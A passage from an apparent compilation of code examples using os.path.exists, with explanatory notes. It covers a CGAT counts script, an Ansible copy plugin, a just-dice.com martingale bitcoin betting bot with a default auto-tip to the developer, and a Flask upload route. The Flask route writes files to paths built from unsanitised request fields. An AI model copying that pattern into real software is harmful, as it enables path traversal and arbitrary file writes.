        if options.filter_min_counts_per_sample:
            counts.removeSamples(
                min_counts_per_sample=options.filter_min_counts_per_sample)

        # remove observations with low counts
        if options.filter_min_counts_per_row:
            counts.removeObservationsFreq(
                min_counts_per_row=options.filter_min_counts_per_row)

        # remove bottom percentile of observations
        if options.filter_percentile_rowsums:
            counts.removeObservationsPerc(
                percentile_rowsums=options.filter_percentile_rowsums)

        nobservations, nsamples = counts.table.shape

        if nobservations == 0:
            E.warn("no observations remaining after filtering- no output")
            return

        if nsamples == 0:
            E.warn("no samples remain after filtering - no output")
            return

        # write out
        counts.table.to_csv(options.stdout, sep="\t", header=True)

    elif options.method == "normalize":

        counts.normalise(method=options.normalization_method,
                         row_title="total")

        # write out
        counts.table.to_csv(options.stdout, sep="\t", header=True)

    elif options.method == "spike":
        # check parameters are sensible and set parameters where they
        # are not explicitly set
        if not options.min_spike:
            E.info("setting minimum number of spikes per bin to equal "
                   "maximum number of spikes per bin (%s)" % options.max_spike)
            options.min_spike = options.max_spike

        if options.spike_type == "cluster":

            assert options.max_sbin <= options.cluster_min_size, \
                ("max size of subcluster: %s is greater than min size of "
                 "cluster: %s" % (options.max_sbin, options.cluster_min_size))

            counts_columns = set(counts.table.columns.values.tolist())

            assert ("contig" in counts_columns and
                    "position" in counts_columns), \
                ("cluster analysis requires columns named 'contig' and "
                 "'position' in the dataframe")

            counts.sort(sort_columns=["contig", "position"], reset_index=True)

        # restrict design table to first pair only

        design.firstPairOnly()

        # get dictionaries to map group members to column names
        # use different methods depending on whether suffixes are supplied
        if options.keep_suffix:
            g_to_keep_tracks, g_to_spike_tracks = design.mapGroupsSuffix(
                options.shuffle_suffix, options.keep_suffix)
        else:
            # if no suffixes supplied, spike and keep tracks are the same
            g_to_track = design.getGroups2Samples()
            g_to_spike_tracks, g_to_keep_tracks = (g_to_track, g_to_track)

        # set up numpy arrays for change and initial values
        change_bins = np.arange(options.min_cbin,
                                options.max_cbin,
                                options.width_cbin)
        initial_bins = np.arange(options.min_ibin,
                                 options.max_ibin,
                                 options.width_ibin)

        E.info("Column boundaries are: %s" % str(change_bins))
        E.info("Row boundaries are: %s" % str(initial_bins))

        # shuffle rows/clusters
        if options.spike_type == "cluster":
            E.info("looking for clusters...")
            clusters_dict = Counts.findClusters(
                counts, options.cluster_max_distance,
                options.cluster_min_size, g_to_spike_tracks, design.groups)
            if len(clusters_dict) == 0:
                raise Exception("no clusters were found, check parameters")

            E.info("shuffling subcluster regions...")
            output_indices, bin_counts = Counts.shuffleCluster(
                initial_bins, change_bins, g_to_spike_tracks, design.groups,
                options.difference, options.max_spike,
                options.iterations, clusters_dict,
                options.max_sbin, options.min_sbin, options.width_sbin)

        elif options.spike_type == "row":

            E.info("shuffling rows...")
            output_indices, bin_counts = counts.shuffleRows(
                options.min_cbin, options.max_cbin, options.width_cbin,
                options.min_ibin, options.max_ibin, options.width_ibin,
                g_to_spike_tracks, design.groups, options.difference,
                options.max_spike, options.iterations)

        filled_bins = Counts.thresholdBins(output_indices, bin_counts,
                                           options.min_spike)

        assert len(filled_bins) > 0, "No bins contained enough spike-ins"

        # write out
        counts.outputSpikes(
            filled_bins,
            g_to_keep_tracks, design.groups,
            output_method=options.output_method,
            spike_type=options.spike_type,
            min_cbin=options.min_cbin,
            width_cbin=options.width_cbin,
            max_cbin=options.max_cbin,
            min_ibin=options.min_ibin,
            width_ibin=options.width_ibin,
            max_ibin=options.max_ibin,
            min_sbin=options.min_sbin,
            width_sbin=options.width_sbin,
            max_sbin=options.max_sbin)

    E.Stop()
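
In the script above, os.path.exists appears in the assert that guards the design table: every method except "normalize" refuses to run unless the supplied design path actually exists on disk. Below is a minimal, self-contained sketch of that guard, assuming nothing beyond pandas; load_design and its error message are illustrative stand-ins, not part of the original script.

import os

import pandas as pd


def load_design(path):
    """Read a tab-separated design table, failing early if the path is unusable."""
    # Check the path up front so the caller gets a clear message rather than a
    # less obvious failure from read_csv further down.
    if path is None or not os.path.exists(path):
        raise ValueError("design file required but not found: %s" % path)
    return pd.read_csv(path, sep="\t", index_col=0, comment="#")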

Example 125

Project: ansible-plugin-copyv
Source File: copyv.py
View license
    def run(self, conn, tmp_path, module_name, module_args, inject, complex_args=None, **kwargs):
        ''' handler for file transfer operations '''

        # load up options
        options = {}
        if complex_args:
            options.update(complex_args)
        options.update(utils.parse_kv(module_args))
        source  = options.get('src', None)
        content = options.get('content', None)
        dest    = options.get('dest', None)
        raw     = utils.boolean(options.get('raw', 'no'))
        force   = utils.boolean(options.get('force', 'yes'))

        # content with newlines is going to be escaped to safely load in yaml
        # now we need to unescape it so that the newlines are evaluated properly
        # when writing the file to disk
        if content:
            if isinstance(content, unicode):
                try:
                    content = content.decode('unicode-escape')
                except UnicodeDecodeError:
                    pass

        if (source is None and content is None and not 'first_available_file' in inject) or dest is None:
            result=dict(failed=True, msg="src (or content) and dest are required")
            return ReturnData(conn=conn, result=result)
        elif (source is not None or 'first_available_file' in inject) and content is not None:
            result=dict(failed=True, msg="src and content are mutually exclusive")
            return ReturnData(conn=conn, result=result)

        # Check if the source ends with a "/"
        source_trailing_slash = False
        if source:
            source_trailing_slash = source.endswith("/")

        # Define content_tempfile in case we set it after finding content populated.
        content_tempfile = None

        # If content is defined make a temp file and write the content into it.
        if content is not None:
            try:
                # If content comes to us as a dict it should be decoded json.
                # We need to encode it back into a string to write it out.
                if type(content) is dict:
                    content_tempfile = self._create_content_tempfile(json.dumps(content))
                else:
                    content_tempfile = self._create_content_tempfile(content)
                source = content_tempfile
            except Exception, err:
                result = dict(failed=True, msg="could not write content temp file: %s" % err)
                return ReturnData(conn=conn, result=result)
        # if we have first_available_file in our vars
        # look up the files and use the first one we find as src
        elif 'first_available_file' in inject:
            found = False
            for fn in inject.get('first_available_file'):
                fn_orig = fn
                fnt = template.template(self.runner.basedir, fn, inject)
                fnd = utils.path_dwim(self.runner.basedir, fnt)
                if not os.path.exists(fnd) and '_original_file' in inject:
                    fnd = utils.path_dwim_relative(inject['_original_file'], 'files', fnt, self.runner.basedir, check=False)
                if os.path.exists(fnd):
                    source = fnd
                    found = True
                    break
            if not found:
                results = dict(failed=True, msg="could not find src in first_available_file list")
                return ReturnData(conn=conn, result=results)
        else:
            source = template.template(self.runner.basedir, source, inject)
            if '_original_file' in inject:
                source = utils.path_dwim_relative(inject['_original_file'], 'files', source, self.runner.basedir)
            else:
                source = utils.path_dwim(self.runner.basedir, source)

        # A list of source file tuples (full_path, relative_path) which will try to copy to the destination
        source_files = []

        # If source is a directory populate our list else source is a file and translate it to a tuple.
        if os.path.isdir(source):
            # Get the amount of spaces to remove to get the relative path.
            if source_trailing_slash:
                sz = len(source) + 1
            else:
                sz = len(source.rsplit('/', 1)[0]) + 1

            # Walk the directory and append the file tuples to source_files.
            for base_path, sub_folders, files in os.walk(source):
                for file in files:
                    full_path = os.path.join(base_path, file)
                    rel_path = full_path[sz:]
                    source_files.append((full_path, rel_path))

            # If it's recursive copy, destination is always a dir,
            # explicitly mark it so (note - copy module relies on this).
            if not conn.shell.path_has_trailing_slash(dest):
                dest = conn.shell.join_path(dest, '')
        else:
            source_files.append((source, os.path.basename(source)))

        changed = False
        diffs = []
        module_result = {"changed": False}

        # A register for if we executed a module.
        # Used to cut down on command calls when not recursive.
        module_executed = False

        # Tell _execute_module to delete the file if there is one file.
        delete_remote_tmp = (len(source_files) == 1)

        # If this is a recursive action create a tmp_path that we can share as the _exec_module create is too late.
        if not delete_remote_tmp:
            if "-tmp-" not in tmp_path:
                tmp_path = self.runner._make_tmp_path(conn)

        # expand any user home dir specifier
        dest = self.runner._remote_expand_user(conn, dest, tmp_path)

        vault = VaultLib(password=self.runner.vault_pass)

        for source_full, source_rel in source_files:
            
            vault_temp_file = None
            data = None

            try:
                data = open(source_full).read()
            except IOError:
                raise errors.AnsibleError("file could not be read: %s" % source_full)

            if vault.is_encrypted(data):
                # if the file is encrypted and no password was specified,
                # the decrypt call would throw an error, but we check first
                # since the decrypt function doesn't know the file name
                if self.runner.vault_pass is None:
                    raise errors.AnsibleError("A vault password must be specified to decrypt %s" % source_full)
                    
                data = vault.decrypt(data)
                # Make a temp file
                vault_temp_file = self._create_content_tempfile(data)
                source_full = vault_temp_file;
            
            # Generate a hash of the local file.
            local_checksum = utils.checksum(source_full)

            # If local_checksum is not defined we can't find the file so we should fail out.
            if local_checksum is None:
                result = dict(failed=True, msg="could not find src=%s" % source_full)
                return ReturnData(conn=conn, result=result)

            # This is kind of optimization - if user told us destination is
            # dir, do path manipulation right away, otherwise we still check
            # for dest being a dir via remote call below.
            if conn.shell.path_has_trailing_slash(dest):
                dest_file = conn.shell.join_path(dest, source_rel)
            else:
                dest_file = conn.shell.join_path(dest)

            # Attempt to get the remote checksum
            remote_checksum = self.runner._remote_checksum(conn, tmp_path, dest_file, inject)

            if remote_checksum == '3':
                # The remote_checksum was executed on a directory.
                if content is not None:
                    # If source was defined as content remove the temporary file and fail out.
                    self._remove_tempfile_if_content_defined(content, content_tempfile)
                    result = dict(failed=True, msg="can not use content with a dir as dest")
                    return ReturnData(conn=conn, result=result)
                else:
                    # Append the relative source location to the destination and retry remote_checksum
                    dest_file = conn.shell.join_path(dest, source_rel)
                    remote_checksum = self.runner._remote_checksum(conn, tmp_path, dest_file, inject)

            if remote_checksum == '4':
                result = dict(msg="python isn't present on the system.  Unable to compute checksum", failed=True)
                return ReturnData(conn=conn, result=result)

            if remote_checksum != '1' and not force:
                # remote_file exists so continue to next iteration.
                continue

            if local_checksum != remote_checksum:
                # The checksums don't match and we will change or error out.
                changed = True

                # Create a tmp_path if missing only if this is not recursive.
                # If this is recursive we already have a tmp_path.
                if delete_remote_tmp:
                    if "-tmp-" not in tmp_path:
                        tmp_path = self.runner._make_tmp_path(conn)

                if self.runner.diff and not raw:
                    diff = self._get_diff_data(conn, tmp_path, inject, dest_file, source_full)
                else:
                    diff = {}

                if self.runner.noop_on_check(inject):
                    self._remove_tempfile_if_content_defined(content, content_tempfile)
                    diffs.append(diff)
                    changed = True
                    module_result = dict(changed=True)
                    continue

                # Define a remote directory that we will copy the file to.
                tmp_src = tmp_path + 'source'

                if not raw:
                    conn.put_file(source_full, tmp_src)
                else:
                    conn.put_file(source_full, dest_file)

                # We have copied the file remotely and no longer require our content_tempfile
                self._remove_tempfile_if_content_defined(content, content_tempfile)

                # Remove the vault tempfile if we have one
                if vault_temp_file:
                    os.remove(vault_temp_file);
                    vault_temp_file = None

                # fix file permissions when the copy is done as a different user
                if self.runner.become and self.runner.become_user != 'root' and not raw:
                    self.runner._remote_chmod(conn, 'a+r', tmp_src, tmp_path)

                if raw:
                    # Continue to next iteration if raw is defined.
                    continue

                # Run the copy module

                # src and dest here come after original and override them
                # we pass dest only to make sure it includes trailing slash in case of recursive copy
                new_module_args = dict(
                    src=tmp_src,
                    dest=dest,
                    original_basename=source_rel
                )
                if self.runner.noop_on_check(inject):
                    new_module_args['CHECKMODE'] = True
                if self.runner.no_log:
                    new_module_args['NO_LOG'] = True

                module_args_tmp = utils.merge_module_args(module_args, new_module_args)

                module_return = self.runner._execute_module(conn, tmp_path, 'copy', module_args_tmp, inject=inject, complex_args=complex_args, delete_remote_tmp=delete_remote_tmp)
                module_executed = True

            else:
                # no need to transfer the file, already correct hash, but still need to call
                # the file module in case we want to change attributes
                self._remove_tempfile_if_content_defined(content, content_tempfile)
                
                # Remove the vault tempfile if we have one
                if vault_temp_file:
                    os.remove(vault_temp_file);
                    vault_temp_file = None

                if raw:
                    # Continue to next iteration if raw is defined.
                    # self.runner._remove_tmp_path(conn, tmp_path)
                    continue

                tmp_src = tmp_path + source_rel

                # Build temporary module_args.
                new_module_args = dict(
                    src=tmp_src,
                    dest=dest,
                    original_basename=source_rel
                )
                if self.runner.noop_on_check(inject):
                    new_module_args['CHECKMODE'] = True
                if self.runner.no_log:
                    new_module_args['NO_LOG'] = True

                module_args_tmp = utils.merge_module_args(module_args, new_module_args)

                # Execute the file module.
                module_return = self.runner._execute_module(conn, tmp_path, 'file', module_args_tmp, inject=inject, complex_args=complex_args, delete_remote_tmp=delete_remote_tmp)
                module_executed = True

            module_result = module_return.result
            if not module_result.get('checksum'):
                module_result['checksum'] = local_checksum
            if module_result.get('failed') == True:
                return module_return
            if module_result.get('changed') == True:
                changed = True

        # Delete tmp_path if we were recursive or if we did not execute a module.
        if (not C.DEFAULT_KEEP_REMOTE_FILES and not delete_remote_tmp) \
            or (not C.DEFAULT_KEEP_REMOTE_FILES and delete_remote_tmp and not module_executed):
            self.runner._remove_tmp_path(conn, tmp_path)

        # the file module returns the file path as 'path', but 
        # the copy module uses 'dest', so add it if it's not there
        if 'path' in module_result and 'dest' not in module_result:
            module_result['dest'] = module_result['path']

        # TODO: Support detailed status/diff for multiple files
        if len(source_files) == 1:
            result = module_result
        else:
            result = dict(dest=dest, src=source, changed=changed)
        if len(diffs) == 1:
            return ReturnData(conn=conn, result=result, diff=diffs[0])
        else:
            return ReturnData(conn=conn, result=result)
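
In the copy action plugin above, os.path.exists drives the first_available_file fallback: each candidate path is templated, a files/-relative lookup is tried when the direct path is missing, and the first candidate that exists on disk becomes the copy source. A stripped-down sketch of that lookup follows; find_first_existing and the sample candidate list are hypothetical, not Ansible API.

import os


def find_first_existing(candidates):
    """Return the first path that exists on disk, or None if none of them do."""
    for path in candidates:
        if os.path.exists(path):
            return path
    return None


source = find_first_existing(["files/app.conf", "files/default.conf"])
if source is None:
    raise RuntimeError("could not find src in first_available_file list")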

Example 126

Project: just-dice-bot
Source File: just-dice-bot.py
View license
    def __init__(self):
        print
        print "Simple martingale bot for just-dice.com"
        print "Copyright (C) 2013 KgBC <[email protected]>"
        print "under GPLv2 (see source)"
        print
        print "News/new versions see https://github.com/KgBC/just-dice-bot"
        
        self.user = self.get_conf("user", "")
        self.password = self.get_conf("pass", "")
        #to debug we want a nicer output:
        self.visible = self.get_conf_int("visible", 0)
        self.lose_rounds = self.get_conf_int("lose_rounds", -1)
        self.chance = self.get_conf("chance", "") #self.get_conf_float("chance", -1.0)
        self.multiplier = self.get_conf("multiplier", "")
        self.safe_perc = self.get_conf_float("safe_perc", 0.0)
        self.autotip = self.get_conf_float("auto-tip", 1)
        self.min_bet = self.get_conf_float('min_bet', 1e-8)
        self.simulate = self.get_conf_int("simulate", -1)
        self.simulate_showevery = 1
        self.wait_loses = self.get_conf_int("wait_loses", 0)
        self.wait_chance= self.get_conf_float("wait_chance", 50.0)
        self.wait_bet   = self.get_conf_float("wait_bet", 1e-08)
        self.hi_lo      = self.get_conf("hi_lo", 'random')
        
        #luck %
        luck_estim = 0.0    #counting all luck we should have 
        luck_lucky = 0.0    #counting real luck
        
        #debug options:
        self.slow_bet = self.get_conf_int('slow_bet', 0)
        self.debug_issue_21 = self.get_conf('debug_issue_21', 0)
        
        #test settings
        if self.user=="":
            print "you need to specify a user name. See config.py"
            sys.exit(1)
        if self.password=="":
            print "you need to specify a password. See config.py"
            sys.exit(2)
        if not (0 <= self.visible <= 1):
            print "visible could be 1 or 0. See config.py"
            self.visible = 1
        if self.lose_rounds <= 0:
            print "lose_rounds must be a number > 0. See config.py"
            sys.exit(3)
        if not self.chance:
            print "a chance must be defined. See config.py"
            sys.exit(4)
        if not self.multiplier:
            print "a multiplier must be defined. See config.py"
            sys.exit(5)
        if not (0.0 <= self.safe_perc < 100.0):
            print "safe_perc must be at least 0 and below 100. See config.py"
            sys.exit(6)
        if not (0.0 <= self.autotip <= 50.0): 
            print "auto-tip could be anything between 0 and 50 %. See config.py"
            self.autotip=50.0
        if not (0 <= self.slow_bet <= 1):
            print "slow_bet could be 1 or 0."
            self.slow_bet = 1
        if not (-1 <= self.simulate):
            print "simulate -1 for no simulation, 0 for simulation, higher int for less luck in %. See config.py"
            self.simulate = -1 #live play default
            
        #do we accept a lose somewhere?
        self.maxlose_perc = 100.0 #we will lose all if we need to play more rounds than expected.
        if type(self.multiplier) is list:
            last = self.multiplier[-1]
            if type(last) is str:
                if last.lower().startswith('lose'):
                    #check params:
                    if self.lose_rounds != len(self.multiplier):
                        print "you are using 'loseX' syntax in multiplier, lose_rounds must match played rounds."
                        sys.exit(23)
                    try:
                        self.maxlose_perc = float(self.multiplier[-1][4:])
                    except:
                        print "multiplier error, loseX must be a number"
                        sys.exit(7)
                    if not 0.0 < self.maxlose_perc <= 100.0:
                        print "multiplier: loseX must be greater than 0 and at most 100. See config.py"
                        sys.exit(8)
        
        #internal vars
        self.balance = 0.0
        self.safe_balance = 0.0
        self.total = 0.0
        self.max_lose = 0.0
        self.most_rows_lost = 0
        lost_sum = 0.0
        lost_rows = 0
        self.show_funds_warning = True
        self.loses_waited = 0
        saldo = 0.0
        self.bet_hi = random.randint(0,1) #random start needed for some hi/lo-modes
        
        #simulating?
        if self.simulate==-1:
            log_fn = "bets.log"
            graph_fn = "bets.png"
            #not simulating:
            self.remote_impl = JustDice_impl()
            banner = " playing on just-dice.com with real btc "
        else:
            log_fn = "bets-simulating.log"
            graph_fn = "bets-simulating.png"
            self.remote_impl = Simulate_impl( luck=self.simulate )
            banner = " fast, random simulating with 100btc (like %) "
        print
        print "#"*10 + banner + "#"*10
        time.sleep(3)
        
        global logHandler
        global logFormatter
        global logger
        logHandler = TimedRotatingFileHandler(log_fn, when="midnight")
        logFormatter = logging.Formatter('%(asctime)s, %(levelname)s: %(message)s')
        logHandler.setFormatter( logFormatter )
        logger = logging.getLogger( 'MyLogger' )
        logger.addHandler( logHandler )
        logger.setLevel( logging.INFO )
        
        #temporary database
        self.db = sqlite3.connect('', isolation_level=None,
                                  detect_types=sqlite3.PARSE_DECLTYPES) #we want a temporary file-based database
        self.db.execute("""
                CREATE TABLE IF NOT EXISTS bets
                    (dt TIMESTAMP, balance REAL);
                """)
        
        print
        print "Set up selenium (this will take a while, be patient) ..."
        self.setUp()
        print "Login (still be patient) ..."
        self.do_login()
        #empty stdin buffer
        for cmd in get_stdin():
            pass
        self.help()
        
        config_no_credentials = jdb_config
        config_no_credentials["user"] = '*'
        config_no_credentials["pass"] = '*'
        logger.info("starting with config: %s" % (repr(config_no_credentials),) )
        
        print "Start betting ..."
        self.starttime = datetime.utcnow()
        self.betcount  = 0
        #start betting
        bet = self.get_max_bet()
        self.run = True
        lost_rows = 0
        self.starting_balance = self.balance
        self.lowest_balance = self.balance
        self.highest_balance = self.balance
        while self.run:
            #import pydevd; pydevd.settrace('127.0.0.1')
            #bet
            try:
                warn = ''
                #prepare bet
                if self.loses_waited < self.wait_loses:
                    #waiting bet
                    chance = self.wait_chance
                    self.betcount += 1
                    bet = self.wait_bet
                else:
                    chance = self.get_chance(lost_rows)
                    self.betcount += 1
                    bet = self.get_rounded_bet(bet, chance)
                #are we below safe-balance? STOP
                if (self.balance - bet) < self.safe_balance:
                    print "STOPPING, we would get below safe percentage in this round!"
                    print "safe_perc: %s%%, balance: %s, safe balance: %s" % (
                                  self.safe_perc, 
                                  "%+.8f" % self.balance,
                                  "%+.8f" % self.safe_balance)
                    self.run = False
                else:
                    #hi/lo strategy
                    if   self.hi_lo == 'random':
                        self.bet_hi = random.randint(0,1)
                    elif self.hi_lo == 'always_hi':
                        self.bet_hi = True
                    elif self.hi_lo == 'always_lo':
                        self.bet_hi = False
                    elif self.hi_lo == 'switch_on_win':
                        if saldo > 0.0:
                            self.bet_hi = not self.bet_hi
                    else:
                        raise Exception("hi_lo config option isn't implemented")
                    
                    #BET BET BET
                    saldo = self.do_bet(chance=chance, bet=bet, bet_hi=self.bet_hi)
                    #luck stats estimate
                    luck_estim += chance
                    if saldo > 0.0:
                        #win
                        bet = self.get_max_bet()
                        
                        #stats about losing
                        lost_sum = 0.0
                        lost_rows = 0
                        #luck stats - won
                        luck_lucky += 100.0
                        
                        #reset waited lost bets:
                        self.loses_waited = 0
                    else:
                        #lose:
                        
                        #are we waiting for lost bets?
                        if self.loses_waited < self.wait_loses:
                            self.loses_waited += 1
                            if self.loses_waited >= self.wait_loses:
                                bet = self.get_max_bet()
                                lost_rows = 0
                        else:
                            #lose, multiplier for next round:
                            multi = self.get_multiplyer(lost_rows)
                            if multi == 'lose':
                                warn += ", we lose"
                                bet = self.get_max_bet()
                                lost_rows = 0
                            else:
                                bet = bet*multi
                                #next rounds vars
                                lost_rows += 1
                                lost_sum += saldo
                    
                    #add win/lose:
                    self.total += saldo
                    #warnings:
                    sim_show_warn = False
                    if lost_sum < self.max_lose:   #numbers are negative
                        self.max_lose = lost_sum
                        warn += ', max lost: %s' % ("%+.8f" % self.max_lose,)
                    if lost_rows > self.most_rows_lost:
                        self.most_rows_lost = lost_rows
                        warn += ', max rows: %s' % (self.most_rows_lost,)
                        sim_show_warn = True
                    
                    #total in 24 hours
                    now = datetime.utcnow()
                    difftime = (now-self.starttime)
                    day_sec = 24*60*60
                    difftime_sec = difftime.days*day_sec + difftime.seconds
                    win_24h = self.total*day_sec/difftime_sec
                    win_24h_percent = win_24h/self.balance*100
                    
                    #lowest/highest balance:
                    #self.starting_balance
                    if self.balance < self.lowest_balance:
                        self.lowest_balance = self.balance
                    if self.balance > self.highest_balance:
                        self.highest_balance = self.balance
                    
                    self.db.execute("""
                        INSERT INTO bets
                            VALUES (?, ?);
                        """, (now, self.balance) )
                    
                    bet_info = "%s%%luck round%s|B%s/%s: %s%s %s (%s%%) = %s total. session: %s (%s(%s%%)/d)%s" % (
                                       "%+6.1f" % (luck_lucky/luck_estim*100-100),
                                       "%3i"     % lost_rows,
                                       "%6i"     % self.betcount,
                                       str(difftime).split('.')[0],
                                       "%+.8f"   % saldo, 
                                       "-h" if (self.bet_hi) else "-l",
                                       "+++" if (saldo>=0) else "---",
                                       "%04.1f"  % chance,
                                       "%0.8f"   % self.balance,
                                       "%+.8f"   % self.total,
                                       "%+.8f"   % win_24h,   #will be more as starting bet should raise
                                       "%+06.1f" % win_24h_percent,
                                       warn)
                    # when simulating print only every 100th bet info + bet's with warnings:
                    if self.simulate == -1:
                        print bet_info
                        logger.info(bet_info)
                    elif sim_show_warn:
                        print bet_info
                        logger.info(bet_info)
                    elif self.betcount % self.simulate_showevery == 0:
                        print bet_info
                        logger.info(bet_info)
                        
                    #graphing
                    if self.simulate == -1:
                        graph_every = 1 #not simulating, every bet
                    else:
                        graph_every = 1000
                    
                    if self.betcount % graph_every == 0:
                        c = self.db.execute("""
                                    SELECT dt, balance 
                                    FROM bets;""")
                        data = c.fetchall()
                        if not data == None:
                            data_dt = []; data_bal = [];
                            for dt, bal in data:
                                data_dt.append(dt)
                                data_bal.append(bal)
                            #graph
                            fig    = Figure()
                            canvas = FigureCanvas(fig)
                            ax = fig.add_subplot(111)
                            fig.autofmt_xdate(bottom=0.2, rotation=30, ha='right')
                            ax.set_xlabel('Time', fontsize=10)
                            ax.set_ylabel('BTC', fontsize=10)
                            ax.plot(data_dt, data_bal, '-', color='r', label='balance')
                            #legend
                            handles, labels = ax.get_legend_handles_labels()
                            ax.legend(handles, labels, loc=2)
                            ax.grid(True)
                            #re-write files
                            if os.path.exists(graph_fn):
                                    os.unlink(graph_fn)
                            canvas.print_figure(graph_fn)
                            
                    
                    #read command line
                    #while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
                    #    cmd = sys.stdin.readline().rstrip('\n')
                    for cmd in get_stdin():
                        if   cmd.lower() in ['q','quit','exit']:
                            #quit
                            self.run = False
                        elif cmd.lower() in ['h','?','help']:
                            self.help()
                        elif cmd.lower().startswith('s'):
                            if cmd[1:]: #set
                                try:
                                    sp = int(cmd[1:])
                                    if sp<=100 and sp>=0:
                                        self.safe_perc = sp
                                        self.safe_balance = 0.0
                                        l = "resetting safe_perc, new value from now on: %s%%" % (sp,)
                                        print l
                                        logger.info(l)
                                except ValueError:
                                    print "command '%s' failed, keeping old safe_perc" % (cmd,)
                            else: #get
                                print "safe_perc is set to %s%%, which is currently %s" % (
                                               self.safe_perc, "%0.8f" % self.safe_balance)
                        elif cmd.lower().startswith('r'):
                            if cmd[1:]: #set
                                if self.maxlose_perc != 100:
                                    print "setting lose_rounds is disabled, incompatible with your multiplier setting."
                                else:
                                    try:
                                        r = int(cmd[1:])
                                        if r>=0:
                                            self.lose_rounds = r
                                            l = "setting lose_rounds to: %s" % (r,)
                                            print l
                                            logger.info(l)
                                    except ValueError:
                                        print "command '%s' failed, keeping old lose_rounds" % (cmd,)
                            else: #get
                                print "lose_rounds is set to %s" % (self.lose_rounds,)
                        else:
                            print "command '%s' not found." % (cmd,)
                            self.help()
            except KeyboardInterrupt:
                self.run = False
            except Exception as e:
                print "Exception %s, retrying..." % (e,)
                print traceback.format_exc()
            
        #all bets done (with 'while True' this will never happen)
        print
        print "Starting balance     : %s" % ("%+.8f" % self.starting_balance,)
        print "Lowest   balance     : %s" % ("%+.8f" % self.lowest_balance,)
        print "Highest  balance     : %s" % ("%+.8f" % self.highest_balance,)
        print "Longest losing streak: %s rows" % (self.most_rows_lost,)
        print "Most expensive streak: %s" % ("%+.8f" % self.max_lose,)
        print 
        
        if self.total > 0.0:
            tip = (self.total/100*self.autotip) - 0.0001 #tip excluding fee.
            print "Congratulations, you won %s since %s (this session)" % (
                       "%+.8f" % self.total, 
                       str(difftime).split('.')[0] )
            if self.autotip==0:
                if not tip <= 0.0:
                    print "Why not tip 1%% = %s to the developer? 1CDjWb7zupTfQihc6sMeDvPmUHkfeMhC83\nYou may also set 'auto-tip' in config.py. \nThanks!" % (
                              "%+.8f" % (self.total/100*1) )
            elif tip <= 0.0:
                print "You are using the auto-tip feature, thanks. This time the tip is too low because of fees."
            else:
                print "You are using auto-tip feature, thanks. I would tip %s to the developer." % (
                           "%+.8f" % tip )
                s = 10
                for cmd in get_stdin(): #empty stdin
                    pass
                print "If you want to cancel the tip, press Enter in next %ss. Also read documentation on auto-tip." % (s,)
                cancel = False
                for x in range(0,s):
                    try: 
                        get_stdin().next()
                        cancel = True
                        break
                    except StopIteration:
                        pass
                    time.sleep(1)
                if cancel:
                    #cmd = sys.stdin.readline().rstrip('\n')
                    print "You decided to cancel my tip. You could also help the project by recommending it somewhere!\nShare this link: https://github.com/KgBC/just-dice-bot"
                else:
                    print "Starting auto-tip ..."
                    ret = self.do_autotip(tip)
                    if '1CDjWb7zupTfQihc6sMeDvPmUHkfeMhC83' in ret:
                        print "You auto-tip'ed. Thanks for your support! king regards, KgBC https://github.com/KgBC/just-dice-bot"
                    else:
                        print "Auto-tip failed, \nError from just-dice: %s\nPlease tip manually: 1CDjWb7zupTfQihc6sMeDvPmUHkfeMhC83" % (
                                       ret,)
        else:
            print "You lost %s since %s (this session)\nYou know, it's betting, so losing is normal.\nYou may want to take less risk, see README: https://github.com/KgBC/just-dice-bot \nIf settings are unclear just file an issue on GitHub. I'll help. Thanks." % (
                       "%+.8f" % self.total, 
                       str(difftime).split('.')[0] )
        print
        print "Shutting down..."
        self.tearDown()
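
Example 126 touches os.path.exists in a single place: before matplotlib re-renders the balance graph, any previously written PNG is unlinked so the file is replaced cleanly. Here is a generic sketch of that remove-then-rewrite pattern, with a plain text payload standing in for the canvas.print_figure call; rewrite_file is an illustrative name, not part of the bot.

import os


def rewrite_file(path, data):
    """Replace whatever is currently at path with freshly generated content."""
    if os.path.exists(path):
        os.unlink(path)  # drop the stale copy first, as the bot does for bets.png
    with open(path, "w") as handle:
        handle.write(data)

Strictly speaking, open(path, "w") truncates an existing file anyway; the explicit exists/unlink pair simply mirrors what the bot does before calling canvas.print_figure.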

Example 127

Project: wharf
Source File: forms.py
View license
@app.route('/forms', methods=['POST'])
def forms():
    try:
        filename = request.json['filename']
        url = request.json['url']
        services = request.json['services']
        i = 0
        j = 0
        if filename:
            file_ext1 = filename.rsplit('.', 1)[1]
            file_ext2 = filename.rsplit('.', 2)[1]
            if file_ext1 == "zip":
                j = move_services(filename, j, 1)
            elif file_ext1 == "gz":
                j = move_services(filename, j, 2)

            missing_files = request.json['missing_files']
            if j == 0:
                j = ""
            service_path = app.config['SERVICES_FOLDER']+file_ext1+str(j)
            service_path2 = app.config['SERVICES_FOLDER']+file_ext2+str(j)
            if "description" in missing_files:
                description = ""
                try:
                    description = request.json['description']
                except:
                    pass
                if file_ext1 == "zip":
                    with open(service_path+"/"+app.config['SERVICE_DICT']['description'], 'w') as f:
                        f.write(description)
                elif file_ext1 == "gz":
                    with open(service_path2+"/"+app.config['SERVICE_DICT']['description'], 'w') as f:
                        f.write(description)
            if "client" in missing_files:
                client = ""
                clientLanguage = ""
                clientFilename = "dummy.txt"
                try:
                    client = request.json['client']
                    clientLanguage = request.json['clientLanguage']
                    clientFilename = request.json['clientFilename']
                except:
                    pass
                if file_ext1 == "zip":
                    if not path.exists(service_path+"/client"):
                        mkdir(service_path+"/client")
                    with open(service_path+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                        f.write(clientLanguage+"\n")
                        f.write(clientFilename)
                    with open(service_path+"/client/"+clientFilename, 'w') as f:
                        f.write(client)
                elif file_ext1 == "gz":
                    if not path.exists(service_path2+"/client"):
                        mkdir(service_path2+"/client")
                    with open(service_path2+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                        f.write(clientLanguage+"\n")
                        f.write(clientFilename)
                    with open(service_path2+"/client/"+clientFilename, 'w') as f:
                        f.write(client)
            if "about" in missing_files:
                missing_metadata(j, filename, "about")
            if "body" in missing_files:
                missing_metadata(j, filename, "body")
            if "link" in missing_files:
                link = "#"
                linkName = "None"
                try:
                    link = request.json['link']
                    linkName = request.json['linkName']
                except:
                    pass
                if file_ext1 == "zip":
                    if not path.exists(service_path+"/html"):
                        mkdir(service_path+"/html")
                    with open(service_path+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                        f.write(link+" "+linkName)
                elif file_ext1 == "gz":
                    if not path.exists(service_path2+"/html"):
                        mkdir(service_path2+"/html")
